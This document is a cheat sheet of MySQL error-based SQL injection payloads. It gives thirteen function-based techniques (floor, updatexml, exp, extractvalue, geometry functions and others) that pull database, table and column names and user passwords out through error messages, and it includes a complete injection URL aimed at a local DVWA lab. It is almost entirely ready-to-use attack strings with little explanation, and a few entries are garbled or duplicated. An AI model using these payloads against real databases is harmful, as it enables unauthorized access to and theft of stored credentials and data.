Common error reporting functions
##1. floor()
- Get database
mysql> select count(*),(concat( 0x3a,database(), 0x3a,floor(rand()*2))) name from information_schema.tables group by name;
- Get table name
mysql> select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=database() limit 3,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
- Get field name
mysql> select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='users' limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
- Get content
mysql> select count(*),concat(0x3a,0x3a,(select username from users limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;
##2. UpdateXml()
- Get table name
mysql> select updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 3,1)),0);
- Get field
mysql> select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 4,1)),0);
- Get content
mysql> select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 4,1)),0);
##3. exp()
and exp(~(select * from (select user() ) a) );
//Exp() is a logarithmic function based on e; for version 5.5.5 and above, please refer to the error reporting article of exp: http://www.cnblogs.com/lcamry/articles/5509124.html exp injection http://netsecurity.51cto.com/art/201508/489529.htm
- Get table name
select exp(~(select*from(select table_name from information_schema.tables where table_schema=database() limit 0,1)x));
- Get column name
select exp(~(select*from(select column_name from information_schema.columns where table_name='users' limit 0,1)x));
- Retrieve data
select exp(~ (select*from(select concat_ws(':',id, username, password) from users limit 0,1)x));
- accomplish at one stroke
exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x)) http://localhost/dvwa/vulnerabilities/sqli/?id=1' or exp(~(select*from(select(concat(@:=0,(select count(*)from`information_schema`.columns where table_schema=database()and@:=concat(@,0xa,table_schema,0x3a3a,table_name,0x3a3a,column_name)),@)))x))-- -&Submit=Submit#
##4. extractvalue() (with length limit, 32-bit maximum)
- Get table name
mysql> select extractvalue(1, concat(0x5c,(select table_name from information_schema.tables where table_schema=database() limit 3,1)));
- Get field
mysql> select extractvalue(1, concat(0x5c,(select password from users limit 1,1)));
##5. NAME_CONST()
Error reporting principle http://www.2cto.com/article/201203/121491.html
grammar
`and+1=(select+*+from+(select+NAME_CONST(PAYLOAD,1),NAME_CONST(PAYLOAD,1))+as+x)`
##6. bigint()
Select! (select * from (select user()) x) - (ps: This is a minus sign) ~ 0
//Bigint is out of range; ~ 0 is a bitwise negation of 0. For large versions of 5.5.5 and above, please refer to the article bigint overflow http://www.cnblogs.com/lcamry/articles/5509112.html
##7. join() principle http://www.jinglingshu.org/?p=4507 grammar
`select * from(select * from mysql.user a join mysql.user b using(Host))c;(It's easy for thieves to use)`
##8. geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
##9. multipoint()
select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));
##10. polygon()
select * from test where id=1 and polygon((select * from(select * from(select user())a)b));
##11. multipolygon()
select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));
##12. linestring()
select * from test where id=1 and linestring((select * from(select * from(select user())a)b));
##13. multilinestring()
select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));
Reference resources https://www.cnblogs.com/wocalieshenmegui/p/5917967.html